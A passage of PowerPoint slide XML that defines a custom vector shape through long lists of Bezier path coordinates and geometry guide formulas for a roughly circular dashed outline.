                    <a:pt x="1815" y="1823"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1843" y="1794"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1838" y="1799"/>
                    <a:pt x="1834" y="1804"/>
                    <a:pt x="1829" y="1809"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1828" y="1810"/>
                    <a:pt x="1828" y="1813"/>
                    <a:pt x="1829" y="1814"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1831" y="1816"/>
                    <a:pt x="1833" y="1816"/>
                    <a:pt x="1835" y="1814"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1840" y="1809"/>
                    <a:pt x="1844" y="1804"/>
                    <a:pt x="1849" y="1800"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1850" y="1798"/>
                    <a:pt x="1850" y="1795"/>
                    <a:pt x="1849" y="1794"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1847" y="1792"/>
                    <a:pt x="1844" y="1793"/>
                    <a:pt x="1843" y="1794"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1870" y="1765"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1865" y="1770"/>
                    <a:pt x="1861" y="1775"/>
                    <a:pt x="1856" y="1779"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1855" y="1781"/>
                    <a:pt x="1855" y="1784"/>
                    <a:pt x="1857" y="1785"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1858" y="1787"/>
                    <a:pt x="1861" y="1786"/>
                    <a:pt x="1862" y="1785"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1867" y="1780"/>
                    <a:pt x="1871" y="1775"/>
                    <a:pt x="1876" y="1770"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1877" y="1768"/>
                    <a:pt x="1877" y="1766"/>
                    <a:pt x="1875" y="1764"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1874" y="1763"/>
                    <a:pt x="1871" y="1763"/>
                    <a:pt x="1870" y="1765"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1895" y="1734"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1891" y="1739"/>
                    <a:pt x="1887" y="1744"/>
                    <a:pt x="1883" y="1749"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1881" y="1751"/>
                    <a:pt x="1881" y="1754"/>
                    <a:pt x="1883" y="1755"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1885" y="1756"/>
                    <a:pt x="1887" y="1756"/>
                    <a:pt x="1889" y="1754"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1893" y="1749"/>
                    <a:pt x="1897" y="1744"/>
                    <a:pt x="1902" y="1739"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1903" y="1737"/>
                    <a:pt x="1903" y="1735"/>
                    <a:pt x="1901" y="1733"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1899" y="1732"/>
                    <a:pt x="1897" y="1732"/>
                    <a:pt x="1895" y="1734"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1895" y="1734"/>
                    <a:pt x="1895" y="1734"/>
                    <a:pt x="1895" y="1734"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1920" y="1702"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1916" y="1708"/>
                    <a:pt x="1912" y="1713"/>
                    <a:pt x="1908" y="1718"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1906" y="1720"/>
                    <a:pt x="1907" y="1722"/>
                    <a:pt x="1908" y="1724"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1910" y="1725"/>
                    <a:pt x="1913" y="1725"/>
                    <a:pt x="1914" y="1723"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1918" y="1718"/>
                    <a:pt x="1922" y="1713"/>
                    <a:pt x="1926" y="1707"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1927" y="1705"/>
                    <a:pt x="1927" y="1703"/>
                    <a:pt x="1925" y="1702"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1924" y="1700"/>
                    <a:pt x="1921" y="1701"/>
                    <a:pt x="1920" y="1702"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1920" y="1702"/>
                    <a:pt x="1920" y="1702"/>
                    <a:pt x="1920" y="1702"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1943" y="1670"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1939" y="1675"/>
                    <a:pt x="1935" y="1681"/>
                    <a:pt x="1932" y="1686"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1930" y="1688"/>
                    <a:pt x="1931" y="1691"/>
                    <a:pt x="1932" y="1692"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1934" y="1693"/>
                    <a:pt x="1937" y="1693"/>
                    <a:pt x="1938" y="1691"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1942" y="1685"/>
                    <a:pt x="1946" y="1680"/>
                    <a:pt x="1950" y="1674"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1951" y="1673"/>
                    <a:pt x="1950" y="1670"/>
                    <a:pt x="1949" y="1669"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1947" y="1668"/>
                    <a:pt x="1944" y="1668"/>
                    <a:pt x="1943" y="1670"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1965" y="1637"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1962" y="1642"/>
                    <a:pt x="1958" y="1648"/>
                    <a:pt x="1954" y="1653"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1953" y="1655"/>
                    <a:pt x="1953" y="1658"/>
                    <a:pt x="1955" y="1659"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1957" y="1660"/>
                    <a:pt x="1960" y="1660"/>
                    <a:pt x="1961" y="1658"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1965" y="1652"/>
                    <a:pt x="1968" y="1647"/>
                    <a:pt x="1972" y="1641"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1973" y="1639"/>
                    <a:pt x="1972" y="1637"/>
                    <a:pt x="1971" y="1635"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1969" y="1634"/>
                    <a:pt x="1966" y="1635"/>
                    <a:pt x="1965" y="1637"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1986" y="1602"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1983" y="1608"/>
                    <a:pt x="1979" y="1614"/>
                    <a:pt x="1976" y="1620"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1974" y="1621"/>
                    <a:pt x="1975" y="1624"/>
                    <a:pt x="1977" y="1625"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1979" y="1626"/>
                    <a:pt x="1981" y="1626"/>
                    <a:pt x="1982" y="1624"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1986" y="1618"/>
                    <a:pt x="1989" y="1612"/>
                    <a:pt x="1993" y="1606"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1994" y="1605"/>
                    <a:pt x="1993" y="1602"/>
                    <a:pt x="1991" y="1601"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1989" y="1600"/>
                    <a:pt x="1987" y="1601"/>
                    <a:pt x="1986" y="1602"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2005" y="1568"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2002" y="1573"/>
                    <a:pt x="1999" y="1579"/>
                    <a:pt x="1996" y="1585"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1995" y="1587"/>
                    <a:pt x="1995" y="1589"/>
                    <a:pt x="1997" y="1591"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1999" y="1592"/>
                    <a:pt x="2002" y="1591"/>
                    <a:pt x="2003" y="1589"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2006" y="1583"/>
                    <a:pt x="2009" y="1577"/>
                    <a:pt x="2012" y="1571"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2013" y="1569"/>
                    <a:pt x="2013" y="1567"/>
                    <a:pt x="2011" y="1566"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2009" y="1565"/>
                    <a:pt x="2006" y="1566"/>
                    <a:pt x="2005" y="1568"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2024" y="1532"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2021" y="1538"/>
                    <a:pt x="2018" y="1544"/>
                    <a:pt x="2015" y="1550"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2014" y="1552"/>
                    <a:pt x="2014" y="1554"/>
                    <a:pt x="2016" y="1555"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2018" y="1556"/>
                    <a:pt x="2021" y="1555"/>
                    <a:pt x="2022" y="1553"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2025" y="1547"/>
                    <a:pt x="2028" y="1541"/>
                    <a:pt x="2031" y="1535"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2032" y="1533"/>
                    <a:pt x="2031" y="1531"/>
                    <a:pt x="2029" y="1530"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2027" y="1529"/>
                    <a:pt x="2024" y="1530"/>
                    <a:pt x="2024" y="1532"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2024" y="1532"/>
                    <a:pt x="2024" y="1532"/>
                    <a:pt x="2024" y="1532"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2040" y="1496"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2038" y="1502"/>
                    <a:pt x="2035" y="1508"/>
                    <a:pt x="2032" y="1514"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2031" y="1516"/>
                    <a:pt x="2032" y="1518"/>
                    <a:pt x="2034" y="1519"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2036" y="1520"/>
                    <a:pt x="2038" y="1519"/>
                    <a:pt x="2039" y="1517"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2042" y="1511"/>
                    <a:pt x="2045" y="1505"/>
                    <a:pt x="2048" y="1499"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2049" y="1497"/>
                    <a:pt x="2048" y="1494"/>
                    <a:pt x="2046" y="1494"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2044" y="1493"/>
                    <a:pt x="2041" y="1494"/>
                    <a:pt x="2040" y="1496"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2056" y="1459"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2053" y="1465"/>
                    <a:pt x="2051" y="1471"/>
                    <a:pt x="2048" y="1477"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2047" y="1479"/>
                    <a:pt x="2048" y="1482"/>
                    <a:pt x="2050" y="1482"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2052" y="1483"/>
                    <a:pt x="2055" y="1482"/>
                    <a:pt x="2056" y="1480"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2058" y="1474"/>
                    <a:pt x="2061" y="1468"/>
                    <a:pt x="2063" y="1462"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2064" y="1460"/>
                    <a:pt x="2063" y="1457"/>
                    <a:pt x="2061" y="1456"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2059" y="1456"/>
                    <a:pt x="2057" y="1457"/>
                    <a:pt x="2056" y="1459"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2070" y="1421"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2068" y="1427"/>
                    <a:pt x="2065" y="1434"/>
                    <a:pt x="2063" y="1440"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2062" y="1442"/>
                    <a:pt x="2063" y="1444"/>
                    <a:pt x="2065" y="1445"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2067" y="1446"/>
                    <a:pt x="2070" y="1445"/>
                    <a:pt x="2070" y="1443"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2073" y="1436"/>
                    <a:pt x="2075" y="1430"/>
                    <a:pt x="2077" y="1424"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2078" y="1422"/>
                    <a:pt x="2077" y="1419"/>
                    <a:pt x="2075" y="1419"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2073" y="1418"/>
                    <a:pt x="2071" y="1419"/>
                    <a:pt x="2070" y="1421"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2082" y="1383"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2080" y="1390"/>
                    <a:pt x="2078" y="1396"/>
                    <a:pt x="2076" y="1402"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2076" y="1404"/>
                    <a:pt x="2077" y="1407"/>
                    <a:pt x="2079" y="1407"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2081" y="1408"/>
                    <a:pt x="2083" y="1407"/>
                    <a:pt x="2084" y="1405"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2086" y="1398"/>
                    <a:pt x="2088" y="1392"/>
                    <a:pt x="2090" y="1386"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2091" y="1383"/>
                    <a:pt x="2089" y="1381"/>
                    <a:pt x="2087" y="1381"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2085" y="1380"/>
                    <a:pt x="2083" y="1381"/>
                    <a:pt x="2082" y="1383"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2093" y="1345"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2092" y="1351"/>
                    <a:pt x="2090" y="1358"/>
                    <a:pt x="2088" y="1364"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2087" y="1366"/>
                    <a:pt x="2089" y="1368"/>
                    <a:pt x="2091" y="1369"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2093" y="1370"/>
                    <a:pt x="2095" y="1368"/>
                    <a:pt x="2096" y="1366"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2098" y="1360"/>
                    <a:pt x="2099" y="1353"/>
                    <a:pt x="2101" y="1347"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2102" y="1345"/>
                    <a:pt x="2100" y="1343"/>
                    <a:pt x="2098" y="1342"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2096" y="1341"/>
                    <a:pt x="2094" y="1343"/>
                    <a:pt x="2093" y="1345"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2103" y="1306"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2102" y="1313"/>
                    <a:pt x="2100" y="1319"/>
                    <a:pt x="2098" y="1325"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2098" y="1328"/>
                    <a:pt x="2099" y="1330"/>
                    <a:pt x="2101" y="1330"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2104" y="1331"/>
                    <a:pt x="2106" y="1330"/>
                    <a:pt x="2106" y="1327"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2108" y="1321"/>
                    <a:pt x="2109" y="1314"/>
                    <a:pt x="2111" y="1308"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2111" y="1306"/>
                    <a:pt x="2110" y="1304"/>
                    <a:pt x="2108" y="1303"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2106" y="1303"/>
                    <a:pt x="2104" y="1304"/>
                    <a:pt x="2103" y="1306"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2111" y="1267"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2110" y="1274"/>
                    <a:pt x="2109" y="1280"/>
                    <a:pt x="2107" y="1287"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2107" y="1289"/>
                    <a:pt x="2108" y="1291"/>
                    <a:pt x="2110" y="1291"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2113" y="1292"/>
                    <a:pt x="2115" y="1290"/>
                    <a:pt x="2115" y="1288"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2117" y="1282"/>
                    <a:pt x="2118" y="1275"/>
                    <a:pt x="2119" y="1269"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2120" y="1266"/>
                    <a:pt x="2118" y="1264"/>
                    <a:pt x="2116" y="1264"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2114" y="1263"/>
                    <a:pt x="2112" y="1265"/>
                    <a:pt x="2111" y="1267"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2118" y="1228"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2117" y="1234"/>
                    <a:pt x="2116" y="1241"/>
                    <a:pt x="2115" y="1247"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2114" y="1250"/>
                    <a:pt x="2116" y="1252"/>
                    <a:pt x="2118" y="1252"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2120" y="1252"/>
                    <a:pt x="2122" y="1251"/>
                    <a:pt x="2123" y="1249"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2124" y="1242"/>
                    <a:pt x="2125" y="1236"/>
                    <a:pt x="2126" y="1229"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2126" y="1227"/>
                    <a:pt x="2125" y="1225"/>
                    <a:pt x="2122" y="1224"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2120" y="1224"/>
                    <a:pt x="2118" y="1226"/>
                    <a:pt x="2118" y="1228"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2123" y="1188"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2122" y="1195"/>
                    <a:pt x="2122" y="1201"/>
                    <a:pt x="2121" y="1208"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2120" y="1210"/>
                    <a:pt x="2122" y="1212"/>
                    <a:pt x="2124" y="1212"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2126" y="1213"/>
                    <a:pt x="2128" y="1211"/>
                    <a:pt x="2129" y="1209"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2130" y="1202"/>
                    <a:pt x="2130" y="1196"/>
                    <a:pt x="2131" y="1189"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2131" y="1187"/>
                    <a:pt x="2130" y="1185"/>
                    <a:pt x="2128" y="1185"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2125" y="1184"/>
                    <a:pt x="2123" y="1186"/>
                    <a:pt x="2123" y="1188"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2127" y="1148"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2126" y="1155"/>
                    <a:pt x="2126" y="1162"/>
                    <a:pt x="2125" y="1168"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2125" y="1170"/>
                    <a:pt x="2127" y="1172"/>
                    <a:pt x="2129" y="1173"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2131" y="1173"/>
                    <a:pt x="2133" y="1171"/>
                    <a:pt x="2133" y="1169"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2134" y="1162"/>
                    <a:pt x="2134" y="1156"/>
                    <a:pt x="2135" y="1149"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2135" y="1147"/>
                    <a:pt x="2133" y="1145"/>
                    <a:pt x="2131" y="1145"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2129" y="1145"/>
                    <a:pt x="2127" y="1146"/>
                    <a:pt x="2127" y="1148"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2129" y="1109"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2129" y="1115"/>
                    <a:pt x="2128" y="1122"/>
                    <a:pt x="2128" y="1128"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2128" y="1131"/>
                    <a:pt x="2130" y="1133"/>
                    <a:pt x="2132" y="1133"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2134" y="1133"/>
                    <a:pt x="2136" y="1131"/>
                    <a:pt x="2136" y="1129"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2136" y="1122"/>
                    <a:pt x="2137" y="1116"/>
                    <a:pt x="2137" y="1109"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2137" y="1107"/>
                    <a:pt x="2135" y="1105"/>
                    <a:pt x="2133" y="1105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2131" y="1105"/>
                    <a:pt x="2129" y="1106"/>
                    <a:pt x="2129" y="1109"/>
                  </a:cubicBezTo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8"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4527435" y="2014891"/>
              <a:ext cx="3214033" cy="3211491"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 2128 w 2138"/>
                <a:gd name="T1" fmla="*/ 1007 h 2137"/>
                <a:gd name="T2" fmla="*/ 2126 w 2138"/>
                <a:gd name="T3" fmla="*/ 906 h 2137"/>
                <a:gd name="T4" fmla="*/ 2098 w 2138"/>
                <a:gd name="T5" fmla="*/ 810 h 2137"/>
                <a:gd name="T6" fmla="*/ 2077 w 2138"/>
                <a:gd name="T7" fmla="*/ 712 h 2137"/>
                <a:gd name="T8" fmla="*/ 2032 w 2138"/>
                <a:gd name="T9" fmla="*/ 622 h 2137"/>
                <a:gd name="T10" fmla="*/ 1986 w 2138"/>
                <a:gd name="T11" fmla="*/ 534 h 2137"/>
                <a:gd name="T12" fmla="*/ 1926 w 2138"/>
                <a:gd name="T13" fmla="*/ 430 h 2137"/>
                <a:gd name="T14" fmla="*/ 1862 w 2138"/>
                <a:gd name="T15" fmla="*/ 358 h 2137"/>
                <a:gd name="T16" fmla="*/ 1786 w 2138"/>
                <a:gd name="T17" fmla="*/ 287 h 2137"/>
                <a:gd name="T18" fmla="*/ 1698 w 2138"/>
                <a:gd name="T19" fmla="*/ 204 h 2137"/>
                <a:gd name="T20" fmla="*/ 1610 w 2138"/>
                <a:gd name="T21" fmla="*/ 156 h 2137"/>
                <a:gd name="T22" fmla="*/ 1522 w 2138"/>
                <a:gd name="T23" fmla="*/ 109 h 2137"/>
                <a:gd name="T24" fmla="*/ 1413 w 2138"/>
                <a:gd name="T25" fmla="*/ 56 h 2137"/>
                <a:gd name="T26" fmla="*/ 1320 w 2138"/>
                <a:gd name="T27" fmla="*/ 33 h 2137"/>
                <a:gd name="T28" fmla="*/ 1177 w 2138"/>
                <a:gd name="T29" fmla="*/ 13 h 2137"/>
                <a:gd name="T30" fmla="*/ 1094 w 2138"/>
                <a:gd name="T31" fmla="*/ 4 h 2137"/>
                <a:gd name="T32" fmla="*/ 978 w 2138"/>
                <a:gd name="T33" fmla="*/ 11 h 2137"/>
                <a:gd name="T34" fmla="*/ 917 w 2138"/>
                <a:gd name="T35" fmla="*/ 10 h 2137"/>
                <a:gd name="T36" fmla="*/ 782 w 2138"/>
                <a:gd name="T37" fmla="*/ 47 h 2137"/>
                <a:gd name="T38" fmla="*/ 701 w 2138"/>
                <a:gd name="T39" fmla="*/ 69 h 2137"/>
                <a:gd name="T40" fmla="*/ 616 w 2138"/>
                <a:gd name="T41" fmla="*/ 104 h 2137"/>
                <a:gd name="T42" fmla="*/ 493 w 2138"/>
                <a:gd name="T43" fmla="*/ 177 h 2137"/>
                <a:gd name="T44" fmla="*/ 422 w 2138"/>
                <a:gd name="T45" fmla="*/ 223 h 2137"/>
                <a:gd name="T46" fmla="*/ 351 w 2138"/>
                <a:gd name="T47" fmla="*/ 282 h 2137"/>
                <a:gd name="T48" fmla="*/ 281 w 2138"/>
                <a:gd name="T49" fmla="*/ 358 h 2137"/>
                <a:gd name="T50" fmla="*/ 199 w 2138"/>
                <a:gd name="T51" fmla="*/ 447 h 2137"/>
                <a:gd name="T52" fmla="*/ 150 w 2138"/>
                <a:gd name="T53" fmla="*/ 530 h 2137"/>
                <a:gd name="T54" fmla="*/ 89 w 2138"/>
                <a:gd name="T55" fmla="*/ 660 h 2137"/>
                <a:gd name="T56" fmla="*/ 56 w 2138"/>
                <a:gd name="T57" fmla="*/ 738 h 2137"/>
                <a:gd name="T58" fmla="*/ 27 w 2138"/>
                <a:gd name="T59" fmla="*/ 830 h 2137"/>
                <a:gd name="T60" fmla="*/ 13 w 2138"/>
                <a:gd name="T61" fmla="*/ 969 h 2137"/>
                <a:gd name="T62" fmla="*/ 4 w 2138"/>
                <a:gd name="T63" fmla="*/ 1053 h 2137"/>
                <a:gd name="T64" fmla="*/ 3 w 2138"/>
                <a:gd name="T65" fmla="*/ 1149 h 2137"/>
                <a:gd name="T66" fmla="*/ 27 w 2138"/>
                <a:gd name="T67" fmla="*/ 1267 h 2137"/>
                <a:gd name="T68" fmla="*/ 50 w 2138"/>
                <a:gd name="T69" fmla="*/ 1364 h 2137"/>
                <a:gd name="T70" fmla="*/ 75 w 2138"/>
                <a:gd name="T71" fmla="*/ 1462 h 2137"/>
                <a:gd name="T72" fmla="*/ 142 w 2138"/>
                <a:gd name="T73" fmla="*/ 1584 h 2137"/>
                <a:gd name="T74" fmla="*/ 177 w 2138"/>
                <a:gd name="T75" fmla="*/ 1657 h 2137"/>
                <a:gd name="T76" fmla="*/ 237 w 2138"/>
                <a:gd name="T77" fmla="*/ 1732 h 2137"/>
                <a:gd name="T78" fmla="*/ 308 w 2138"/>
                <a:gd name="T79" fmla="*/ 1807 h 2137"/>
                <a:gd name="T80" fmla="*/ 376 w 2138"/>
                <a:gd name="T81" fmla="*/ 1882 h 2137"/>
                <a:gd name="T82" fmla="*/ 493 w 2138"/>
                <a:gd name="T83" fmla="*/ 1959 h 2137"/>
                <a:gd name="T84" fmla="*/ 558 w 2138"/>
                <a:gd name="T85" fmla="*/ 2007 h 2137"/>
                <a:gd name="T86" fmla="*/ 652 w 2138"/>
                <a:gd name="T87" fmla="*/ 2044 h 2137"/>
                <a:gd name="T88" fmla="*/ 745 w 2138"/>
                <a:gd name="T89" fmla="*/ 2079 h 2137"/>
                <a:gd name="T90" fmla="*/ 840 w 2138"/>
                <a:gd name="T91" fmla="*/ 2112 h 2137"/>
                <a:gd name="T92" fmla="*/ 980 w 2138"/>
                <a:gd name="T93" fmla="*/ 2125 h 2137"/>
                <a:gd name="T94" fmla="*/ 1059 w 2138"/>
                <a:gd name="T95" fmla="*/ 2137 h 2137"/>
                <a:gd name="T96" fmla="*/ 1159 w 2138"/>
                <a:gd name="T97" fmla="*/ 2125 h 2137"/>
                <a:gd name="T98" fmla="*/ 1263 w 2138"/>
                <a:gd name="T99" fmla="*/ 2115 h 2137"/>
                <a:gd name="T100" fmla="*/ 1352 w 2138"/>
                <a:gd name="T101" fmla="*/ 2095 h 2137"/>
                <a:gd name="T102" fmla="*/ 1450 w 2138"/>
                <a:gd name="T103" fmla="*/ 2059 h 2137"/>
                <a:gd name="T104" fmla="*/ 1562 w 2138"/>
                <a:gd name="T105" fmla="*/ 2017 h 2137"/>
